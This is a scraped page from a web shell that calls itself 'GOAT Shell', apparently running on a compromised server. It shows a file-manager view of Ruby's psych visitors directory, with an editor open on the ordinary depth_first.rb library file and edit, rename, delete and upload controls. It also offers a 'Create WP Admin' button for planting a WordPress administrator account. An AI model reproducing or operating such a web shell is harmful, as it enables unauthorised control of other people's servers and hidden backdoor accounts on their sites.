🐐 GOAT Shell
Current path:
opt
/
alt
/
ruby24
/
lib64
/
ruby
/
2.4.0
/
psych
/
visitors
/
👤 Create WP Admin
⬆️
Go up: psych
✏️ Editing: depth_first.rb
# frozen_string_literal: false module Psych module Visitors class DepthFirst < Psych::Visitors::Visitor def initialize block @block = block end private def nary o o.children.each { |x| visit x } @block.call o end alias :visit_Psych_Nodes_Stream :nary alias :visit_Psych_Nodes_Document :nary alias :visit_Psych_Nodes_Sequence :nary alias :visit_Psych_Nodes_Mapping :nary def terminal o @block.call o end alias :visit_Psych_Nodes_Scalar :terminal alias :visit_Psych_Nodes_Alias :terminal end end end
Save
📄
depth_first.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
emitter.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
json_tree.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
to_ruby.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
visitor.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
yaml_tree.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📤 Upload File
Upload
📁 Create Folder
Create Folder